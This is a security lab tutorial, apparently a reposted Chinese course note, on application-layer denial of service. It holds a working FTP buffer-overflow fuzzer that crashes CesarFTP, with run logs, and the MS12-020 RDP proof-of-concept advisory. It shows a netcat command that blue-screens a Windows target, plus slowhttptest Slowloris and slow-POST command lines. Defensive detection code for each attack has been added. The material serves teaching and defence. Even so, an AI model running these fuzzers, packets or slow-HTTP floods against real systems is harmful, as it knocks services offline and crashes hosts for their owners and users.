• (8) Denial of Service: Application-Layer DoS Attacks


    1. Introduction
    Application service vulnerabilities
    The service code has a flaw, and the program crashes when it receives abnormal input.
    The application can handle only a limited number of concurrent requests; what ends up denied is the application or the OS.
    Buffer overflow vulnerabilities
    Random data is submitted to the target function; under specific conditions the data overwrites adjacent registers or memory.
    Impact: remote code execution, DoS
    Fuzz testing is used to discover buffer overflow vulnerabilities.
    CesarFTP 0.99 service vulnerability
    server.exe is the server program; CesarFTP is the configuration management program.
    Start the server program, then open the configuration tool and add an account.
    Click into the file access permissions and specify the program's home directory.
    ftp_fuzz.py # MKD/RMD
    #!/usr/bin/env python3
    # -*- coding: utf-8 -*-
    # Send the chosen FTP command with an argument of growing length; a connection
    # that fails on the next round is taken to mean the service has crashed.
    import socket
    import sys

    if len(sys.argv) != 6:
        print("用法: ./ftp_fuzz.py [目标IP] [目标端口] [载荷] [步长] [最大长度]")
        print("举例:./ftp_fuzz.py 1.1.1.1 21 A 100 1000")
        sys.exit(1)

    ip = sys.argv[1]
    port = int(sys.argv[2])
    char = sys.argv[3]          # byte pattern to repeat
    i = int(sys.argv[4])        # first length equals one step
    step = int(sys.argv[4])
    max_len = int(sys.argv[5])  # stop after this many repetitions

    user = input("FTP账号: ")
    passwd = input("FTP密码: ")
    command = input("FTP命令: ")

    while i <= max_len:
        try:
            payload = command + " " + (char * i)
            print("已发送" + str(i) + "个 (" + char + ")")
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.connect((ip, port))
            s.recv(1024)
            s.send(("USER " + user + "\r\n").encode())
            s.recv(1024)
            s.send(("PASS " + passwd + "\r\n").encode())
            s.recv(1024)
            s.send((payload + "\r\n").encode())
            s.send(b"QUIT\r\n")
            s.recv(1024)
            s.close()
            i = i + step
        except OSError:
            print(" 服务已崩溃")
            sys.exit()
    print(" 未发现缓冲区溢出漏洞")
    ———————————————————————————–
    root@K:~# ./ftp_fuzz.py
    用法: ./ftp_fuzz.py [目标IP] [目标端口] [载荷] [步长] [最大长度]
    举例:./ftp_fuzz.py 1.1.1.1 21 A 100 1000
    root@K:~# ./ftp_fuzz.py 192.168.1.127 21 A 100 2000
    FTP账号:anonymous
    FTP密码:
    FTP命令:PWD
    已发送100 个 (A)
    已发送200 个 (A)
    已发送300 个 (A)
    已发送400 个 (A)
    已发送500 个 (A)
    已发送600 个 (A)
    已发送700 个 (A)
    已发送800 个 (A)
    已发送900 个 (A)
    已发送1000 个 (A)
    已发送1100 个 (A)
    已发送1200 个 (A)
    已发送1300 个 (A)
    已发送1400 个 (A)
    已发送1500 个 (A)
    已发送1600 个 (A)
    已发送1700 个 (A)
    已发送1800 个 (A)
    服务已崩溃
    root@K:~# ./ftp_fuzz.py 192.168.1.127 21 A 100 2000
    FTP账号:anonymous
    FTP密码:
    FTP命令:MKD
    已发送100 个 (A)
    已发送200 个 (A)
    已发送300 个 (A)
    已发送400 个 (A)
    已发送500 个 (A)
    已发送600 个 (A)
    已发送700 个 (A)
    已发送800 个 (A)
    已发送900 个 (A)
    已发送1000 个 (A)
    已发送1100 个 (A)
    已发送1200 个 (A)
    已发送1300 个 (A)
    已发送1400 个 (A)
    已发送1500 个 (A)
    已发送1600 个 (A)
    已发送1700 个 (A)
    已发送1800 个 (A)
    已发送1900 个 (A)
    已发送2000 个 (A)
    未发现缓冲区溢出漏洞
    root@K:~# ./ftp_fuzz.py 192.168.1.127 21 ABCD 100 2000
    FTP账号:anonymous
    FTP密码:
    FTP命令:RMD
    已发送100 个 (A)
    已发送200 个 (A)
    已发送300 个 (A)
    已发送400 个 (A)
    已发送500 个 (A)
    已发送600 个 (A)
    已发送700 个 (A)
    服务已崩溃
    Neither test took effect; the FTP service can still be logged into!
    ———————————————————————————–
    [ftp_fuzz1.py]
    #!/usr/bin/env python3
    # -*- coding: utf-8 -*-
    # Variant of ftp_fuzz.py: the argument is a growing run of CR/LF pairs instead
    # of a printable byte, so the [载荷] argument is accepted but not used.
    import socket
    import sys

    if len(sys.argv) != 6:
        print("用法: ./ftp_fuzz.py [目标IP] [目标端口] [载荷] [步长] [最大长度]")
        print("举例:./ftp_fuzz.py 1.1.1.1 21 A 100 1000")
        sys.exit(1)

    ip = sys.argv[1]
    port = int(sys.argv[2])
    char = sys.argv[3]          # kept for a uniform command line; unused below
    i = int(sys.argv[4])
    step = int(sys.argv[4])
    max_len = int(sys.argv[5])  # the original omitted this line, leaving max undefined

    user = input("FTP账号: ")
    passwd = input("FTP密码: ")
    command = input("FTP命令: ")

    while i <= max_len:
        try:
            payload = command + " " + ("\r\n" * i)
            print("已发送" + str(i) + "个换行符")
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.connect((ip, port))
            s.recv(1024)
            s.send(("USER " + user + "\r\n").encode())
            s.recv(1024)
            s.send(("PASS " + passwd + "\r\n").encode())
            s.recv(1024)
            s.send((payload + "\r\n").encode())
            s.send(b"QUIT\r\n")
            s.recv(1024)
            s.close()
            i = i + step
        except OSError:
            print(" 服务已崩溃")
            sys.exit()
    print(" 未发现缓冲区溢出漏洞")
    ———————————————————————————–
    root@K:~# ./ftp_fuzz.py
    用法: ./ftp_fuzz.py [目标IP] [目标端口] [载荷] [步长] [最大长度]
    举例:./ftp_fuzz.py 1.1.1.1 21 A 100 1000
    root@K:~# ./ftp_fuzz.py 192.168.1.127 21 100 1000
    FTP账号:anonymous
    FTP密码:
    FTP命令:MKD
    已发送100 个 (A)
    已发送200 个 (A)
    已发送300 个 (A)
    已发送400 个 (A)
    已发送500 个 (A)
    已发送600 个 (A)
    已发送700 个 (A)
    服务已崩溃
    The server-side FTP has already thrown an error!
    root@K:~# ./ftp_fuzz.py 192.168.1.127 21 100 1000
    FTP账号:anonymous
    FTP密码:
    FTP命令:RMD
    已发送100 个 (A)
    已发送200 个 (A)
    已发送300 个 (A)
    已发送400 个 (A)
    已发送500 个 (A)
    已发送600 个 (A)
    已发送700 个 (A)
    服务已崩溃
    Wireshark filter
    ip.addr==192.168.1.127
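As an added defensive example (not part of the original notes), the following Python 3 check scans FTP control-channel commands, such as those exported from the Wireshark stream above, for the shapes the fuzzer produces: an argument on an argument-less verb such as PWD, an oversized argument, bare CR/LF inside an argument, and a long single-byte run. The sample lines, the 255-byte ceiling and the argument-less verb set are constructed assumptions.

```python
import re

# Constructed sample of FTP control-channel commands, one per line, in the shape a
# "Follow TCP stream" export would give them (not real captures).
SAMPLE_COMMANDS = [
    "USER anonymous",
    "PASS ",
    "PWD",
    "MKD " + "A" * 700,      # the oversized MKD argument that crashed CesarFTP above
    "PWD " + "A" * 1900,     # PWD takes no argument at all
    "RMD " + "\r\n" * 300,   # the ftp_fuzz1.py variant: CR/LF runs inside the argument
    "CWD pub",
    "QUIT",
]

MAX_ARG_LEN = 255   # assumed ceiling; set to the server's documented path limit
# Assumed set of verbs that never carry an argument (RFC 959 syntax).
NO_ARG_COMMANDS = {"PWD", "QUIT", "NOOP", "SYST", "PASV", "ABOR", "CDUP"}


def inspect_ftp_command(line):
    """Return anomaly tags for one FTP command line; an empty list means it looks benign."""
    verb, _, arg = line.partition(" ")
    verb = verb.upper()
    findings = []
    if verb in NO_ARG_COMMANDS and arg:
        findings.append("argument-on-argless-command")
    if len(arg) > MAX_ARG_LEN:
        findings.append("oversized-argument")
    if "\r" in arg or "\n" in arg:
        findings.append("crlf-in-argument")
    # A long argument made of one repeated byte is the fuzzer's signature.
    if len(arg) >= 64 and re.fullmatch(r"(.)\1*", arg, re.S):
        findings.append("single-byte-run")
    return findings


def scan(lines):
    """Map the index of every suspicious line to its findings."""
    report = {}
    for idx, line in enumerate(lines):
        found = inspect_ftp_command(line)
        if found:
            report[idx] = found
    return report
```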
    2. MS12-020
    root@K:~# searchsploit ms12-020
    ----------------------------------------------------- ----------------------------------
     Exploit Title                                       | Path
                                                         | (/usr/share/exploitdb/platforms)
    ----------------------------------------------------- ----------------------------------
    Microsoft Terminal Services Use After Free (MS12-020 | ./windows/dos/18606.txt
    ----------------------------------------------------- ----------------------------------
    root@K:~# cp /usr/share/exploitdb/platforms/windows/dos/18606.txt .
    root@K:~# ls
    18606.txt Documents ftp_fuzz1.py hs_err_pid1982.log Music Public videos
    Desktop Downloads ftp_fuzz.py hs_err_pid2077.log Pictures Templates
    ———————————————————————————–
    root@K:~# geany 18606.txt
    #######################################################################
    Luigi Auriemma
    Application: Microsoft Terminal Services / Remote Desktop Services
    http://www.microsoft.com
    http://msdn.microsoft.com/en-us/library/aa383015(v=vs.85).aspx
    Versions: any Windows version before 13 Mar 2012
    Platforms: Windows
    Bug: use after free
    Exploitation: remote, versus server
    Date: 16 Mar 2012 (found 16 May 2011)
    Author: Luigi Auriemma
    e-mail: aluigi@autistici.org
    web: aluigi.org
    Additional references:
    http://www.zerodayinitiative.com/advisories/ZDI-12-044/
    http://technet.microsoft.com/en-us/security/bulletin/ms12-020
    #######################################################################
    1) Introduction
    2) Bug
    3) The Code
    4) Fix
    #######################################################################
    ===============
    1) Introduction
    ===============
    From vendor’s homepage:
    “The Microsoft Remote Desktop Protocol (RDP) provides remote display
    and input capabilities over network connections for Windows-based
    applications running on a server. RDP is designed to support different
    types of network topologies and multiple LAN protocols.”
    #######################################################################
    ======
    2) Bug
    ======
    The Remote Desktop Protocol is used by the “Terminal Services / Remote
    Desktop Services” and works at kernel level on port 3389.
    There is a use-after-free vulnerability located in the handling of the
    maxChannelIds field of the T.125 ConnectMCSPDU packet (offset 0x2c of
    the provided proof-of-concept) when set to a value less than or equal to 5.
    The problem happens during the disconnection of the user started with
    RDPWD!NM_Disconnect while the effect of the possible code execution is
    visible in termdd!IcaBufferAlloc (or termdd!IcaBufferAllocEx on
    Windows 7/2008) after termdd!IcaGetPreviousSdLink returns an invalid
    memory pointer, the following dump is taken from Windows 2003 Server:
    f761887c 8bff mov edi,edi
    f761887e 55 push ebp
    f761887f 8bec mov ebp,esp
    f7618881 56 push esi
    f7618882 57 push edi
    f7618883 8b7d08 mov edi,dword ptr [ebp+8]
    f7618886 8d47ec lea eax,[edi-14h]
    f7618889 50 push eax
    f761888a eb09 jmp termdd!IcaBufferAlloc+0x19 (f7618895)
    f761888c 8b4618 mov eax,dword ptr [esi+18h] ; we are here
    f761888f 833800 cmp dword ptr [eax],0 ; or here
    f7618892 7527 jne termdd!IcaBufferAlloc+0x3f (f76188bb) ; must jump
    f7618894 56 push esi
    f7618895 e878290000 call termdd!IcaGetPreviousSdLink (f761b212) ; the new ESI is returned by this function
    f761889a 8bf0 mov esi,eax
    f761889c 85f6 test esi,esi
    f761889e 75ec jne termdd!IcaBufferAlloc+0x10 (f761888c)
    f76188a0 ff751c push dword ptr [ebp+1Ch]
    f76188a3 ff7518 push dword ptr [ebp+18h]
    f76188a6 ff7514 push dword ptr [ebp+14h]
    f76188a9 ff7510 push dword ptr [ebp+10h]
    f76188ac ff750c push dword ptr [ebp+0Ch]
    f76188af 57 push edi
    f76188b0 e8b9fcffff call termdd!IcaBufferAllocInternal (f761856e)
    f76188b5 5f pop edi
    f76188b6 5e pop esi
    f76188b7 5d pop ebp
    f76188b8 c21800 ret 18h
    f76188bb 33c0 xor eax,eax
    f76188bd 53 push ebx
    f76188be 8d7e10 lea edi,[esi+10h]
    f76188c1 40 inc eax
    f76188c2 f00fc107 lock xadd dword ptr [edi],eax
    f76188c6 ff751c push dword ptr [ebp+1Ch]
    f76188c9 8b4618 mov eax,dword ptr [esi+18h] ; the same value of before
    f76188cc ff7518 push dword ptr [ebp+18h]
    f76188cf ff7514 push dword ptr [ebp+14h]
    f76188d2 ff7510 push dword ptr [ebp+10h]
    f76188d5 ff750c push dword ptr [ebp+0Ch]
    f76188d8 ff761c push dword ptr [esi+1Ch]
    f76188db ff10 call dword ptr [eax] ; code execution
    f76188dd 8bd8 mov ebx,eax
    f76188df 83c8ff or eax,0FFFFFFFFh
    f76188e2 f00fc107 lock xadd dword ptr [edi],eax
    f76188e6 7506 jne termdd!IcaBufferAlloc+0x72 (f76188ee)
    f76188e8 56 push esi
    f76188e9 e8382f0000 call termdd!_IcaUnloadSd (f761b826)
    f76188ee 8bc3 mov eax,ebx
    f76188f0 5b pop ebx
    f76188f1 ebc2 jmp termdd!IcaBufferAlloc+0x39 (f76188b5)
    eax=040b0402 ebx=e1492090 ecx=00390080 edx=00000003 esi=040b0402 edi=e1438240
    eip=f762888c esp=b832f9d8 ebp=b832f9e0 iopl=0 nv up ei pl nz na po nc
    cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010202
    termdd!IcaBufferAlloc+0x10:
    f762888c 8b4618 mov eax,dword ptr [esi+18h] ds:0023:040b041a=
    ChildEBP RetAddr
    b8b399e0 b89c1c34 termdd!IcaBufferAlloc+0x10
    b8b39a00 b89c1c67 RDPWD!StackBufferAlloc+0x26
    b8b39a2c b89a902c RDPWD!MCSDetachUserRequest+0x29
    b8b39a40 b89a8b44 RDPWD!NMDetachUserReq+0x14
    b8b39a4c b89a9185 RDPWD!NM_Disconnect+0x16
    b8b39a58 b89adcb4 RDPWD!SM_Disconnect+0x27
    b8b39a68 b89a906d RDPWD!SM_OnConnected+0x70
    b8b39a88 b89a8db4 RDPWD!NMAbortConnect+0x23
    b8b39ac0 b89a9d88 RDPWD!NM_Connect+0x86
    b8b39ae0 b89abcfc RDPWD!SM_Connect+0x112
    b8b39b08 b89ac786 RDPWD!WDWConnect+0x368
    b8b39b3c b89a6959 RDPWD!WDWConfConnect+0x94
    b8b39b70 f762c1c7 RDPWD!WD_Ioctl+0x1227
    b8b39b8c f762c5a3 termdd!_IcaCallSd+0x35
    b8b39bac f762ca10 termdd!_IcaCallStack+0x55
    b8b39bf4 f762abcc termdd!IcaDeviceControlStack+0x414
    b8b39c24 f762ad20 termdd!IcaDeviceControl+0x4e
    b8b39c3c 8081d5c3 termdd!IcaDispatch+0x12a
    b8b39c50 808ed4eb nt!IofCallDriver+0x45
    b8b39c64 808ee28d nt!NtWriteFile+0x2943
    b8b39d00 808e6dbc nt!NtWriteFile+0x36e5
    b8b39d34 80883968 nt!NtDeviceIoControlFile+0x2a
    b8b39d64 7c82847c nt!KeReleaseInStackQueuedSpinLockFromDpcLevel+0xb14
    b8b39d68 badb0d00 ntdll!_NLG_Notify+0x14
    On Windows 2003 that zone of the memory pointed by ESI+18 using the
    provided proof-of-concept is ever in the range 040b02-040b04.
    The exploitability depends on the possibility of controlling ESI or the
    content pointed by it (maybe via a form of heap spraying), indeed in
    my quick tests this zone sometimes is allocated and others it isn’t.
    Note that on the post-Vista Windows versions (like 7 and 2008) “seems”
    necessary to have “Allow connections from computers running any version
    of Remote Desktop” for being vulnerable.
    Anyway I’m not totally sure about this so-called limitation because it
    looks like dependent on my proof-of-concept only.
    The provided proof-of-concept uses the BER integer values set at 32bit
    (big endian) in case they could be useful for easier debugging.
    Additional details about the protocol:
    http://msdn.microsoft.com/en-us/library/cc240836%28v=prot.10%29.aspx
    #######################################################################
    ===========
    3) The Code
    ===========
    http://aluigi.org/poc/termdd_1.dat
    https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/18606.dat
    nc SERVER 3389 < termdd_1.dat
    resend it multiple times in case of no results and note that this is
    just a simple proof-of-concept packet to quickly test the bug so it’s
    not optimized at all.
    #######################################################################
    ======
    4) Fix
    ======
    http://technet.microsoft.com/en-us/security/bulletin/ms12-020
    #######################################################################
    ———————————————————————————–
    root@K:~/Downloads# nc 192.168.1.127 3389 < termdd_1.dat
    After sending it five or six times, the target blue-screened and rebooted.
    After sending it once more, it rebooted outright!
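Added example, not from the advisory or the course notes: a Python 3 decoder for the BER-encoded T.125 DomainParameters SEQUENCE (the targetParameters of a Connect-Initial PDU) that flags the maxChannelIds <= 5 condition the advisory describes, the check a detection rule would make. It assumes the caller has already located that SEQUENCE inside the X.224/TPKT stream; the sample byte strings are constructed here with 32-bit integers, the width the advisory says its proof-of-concept uses.

```python
import struct

# T.125 DomainParameters field order (ITU-T T.125; also MS-RDPBCGR targetParameters).
DOMAIN_PARAM_NAMES = ("maxChannelIds", "maxUserIds", "maxTokenIds", "numPriorities",
                      "minThroughput", "maxHeight", "maxMCSPDUsize", "protocolVersion")


def read_ber_length(buf, pos):
    """Decode the BER length octet(s) at buf[pos]; return (length, position after them)."""
    first = buf[pos]
    if first < 0x80:                       # short form: one octet
        return first, pos + 1
    n = first & 0x7F                       # long form: next n octets hold the length
    return int.from_bytes(buf[pos + 1:pos + 1 + n], "big"), pos + 1 + n


def ber_integer_sequence(buf):
    """Return the values of a BER SEQUENCE (0x30) whose elements are all INTEGERs (0x02)."""
    if not buf or buf[0] != 0x30:
        raise ValueError("not a BER SEQUENCE")
    length, pos = read_ber_length(buf, 1)
    end = pos + length
    values = []
    while pos < end:
        if buf[pos] != 0x02:
            raise ValueError("non-INTEGER element at offset %d" % pos)
        ilen, pos = read_ber_length(buf, pos + 1)
        values.append(int.from_bytes(buf[pos:pos + ilen], "big", signed=True))
        pos += ilen
    return values


def check_domain_parameters(buf):
    """Decode targetParameters and flag it when maxChannelIds <= 5 (the advisory's condition)."""
    values = ber_integer_sequence(buf)
    if len(values) != len(DOMAIN_PARAM_NAMES):
        raise ValueError("DomainParameters must hold exactly 8 INTEGERs")
    fields = dict(zip(DOMAIN_PARAM_NAMES, values))
    return fields, fields["maxChannelIds"] <= 5


def encode_domain_parameters(values):
    """Constructed-sample builder: 8 INTEGERs as 32-bit big-endian BER, as the PoC encodes them."""
    body = b"".join(b"\x02\x04" + struct.pack(">I", v) for v in values)
    return b"\x30" + bytes([len(body)]) + body


# Constructed samples: values a stock client typically sends, and the <= 5 case.
NORMAL_TARGET_PARAMS = encode_domain_parameters((34, 2, 0, 1, 0, 1, 0xFFFF, 2))
SUSPECT_TARGET_PARAMS = encode_domain_parameters((5, 2, 0, 1, 0, 1, 0xFFFF, 2))
```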
    3. Slowhttptest
    Slowhttptest (originated at Google)
    Low-bandwidth application-layer slow DoS attack (slow relative to fast attacks such as CC)
    Originally written in Python; cross-platform (Linux, Windows, Cygwin, OSX)
    Especially effective against Apache and Tomcat (almost always succeeds)
    Attack method
    Slowloris and Slow HTTP POST attacks
    Exhaust the application's concurrent connection pool; analogous to a SYN flood at the HTTP layer
    By default the HTTP server begins processing only after it has received the whole request; if the client sends slowly or incompletely, the server keeps the connection's resources reserved for it, and a large number of such concurrent connections leads to DoS
    Slowloris: a complete HTTP request ends with \r\n\r\n; the attack sends……
    Slow POST: the HTTP Content-Length header declares a length, but the body is sent slowly
    Attack method
    Slow Read attack
    Same goal as Slowloris and Slow POST: exhaust the application's concurrent connection pool
    The difference is that the request is sent normally, but the response data is read slowly
    The attacker shrinks the TCP window size so that the server returns data slowly
    Attack method
    Apache Range Header attack
    When a client transfers a large file whose size exceeds the HTTP body size limit, the transfer is split into ranges
    Exhausts server CPU and memory
    ulimit -n 70000
    HTTP POST attack mode
    slowhttptest -c 1000 -B -g -o body_stats -i 110 -r 200 -s 8192 -t FAKEVERB -u http://10.10.10.132 -x 10 -p 3 -l 10000
    Slowloris attack mode
    slowhttptest -c 1000 -H -g -o header_stats -i 10 -r 200 -t GET -u http://10.10.10.132 -x 24 -p 3
    Proxies are supported
    Many application servers and security devices cannot defend against slow attacks
    4. Attack test
    root@kali:~# slowhttptest -c 60000 -B -g -o body_stats -i 110 -r 200 -s 8192 -t FAKEVERB -u http://10.10.10.132 -x 10 -p 3 -l 999999
    -l sets the duration of the attack
    root@kali:~# slowhttptest -c 1000 -H -g -o my_header_stats -i 10 -r 200 -s 8192 -t GET -u http://192.168.8.158 -x 10 -p 3
    root@kali:~# man slowhttptest
    ulimit -a shows the current user process limits.
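Added example (not part of the notes or of slowhttptest): a Python 3 model of the server-side control that defeats Slowloris and Slow POST, patterned on the per-bytes extension logic of Apache's RequestReadTimeout header=20-40,MinRate=500. The connection timelines are constructed, sampled once per second, and stand in for the connections the slowhttptest runs above would open.

```python
# Constructed per-connection timelines: (seconds since accept, request bytes received so far),
# sampled once per second. The first completes a request in under a second; the other two
# mimic a Slowloris header drip (-H mode) and a Slow POST body drip (-B mode).
NORMAL_CLIENT = [(1, 512)]
SLOWLORIS = [(t, 8 * t) for t in range(1, 61)]          # one 8-byte header fragment per second
SLOW_POST = [(t, 1024 + 10 * t) for t in range(1, 61)]  # headers done, body trickles at 10 B/s


def request_read_deadline(samples, initial=20, maximum=40, min_rate=500, complete_at=None):
    """Apply a RequestReadTimeout-style rule (header=20-40,MinRate=500) to one connection.

    The client gets `initial` seconds to finish the request; every `min_rate` bytes
    received buys one more second, capped at `maximum`. Returns the second at which the
    connection should be dropped, or None when the request (declared complete once
    `complete_at` bytes have arrived) lands in time or the samples end before the deadline.
    """
    for elapsed, received in samples:
        if complete_at is not None and received >= complete_at:
            return None                       # request finished; hand it to the worker
        deadline = min(maximum, initial + received // min_rate)
        if elapsed > deadline:
            return elapsed                    # too slow for the bytes delivered so far
    return None


def classify(connections, **rule):
    """Return {name: drop_second_or_None} for a set of named connection timelines."""
    return {name: request_read_deadline(samples, **rule)
            for name, samples in connections.items()}
```

Slow Read is not caught by this rule, because its request arrives normally; it needs a send-side minimum rate or a check on connections whose advertised receive window stays near zero.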
  • Original address: https://www.cnblogs.com/micr067/p/12519778.html
Copyright © 2020-2023  润新知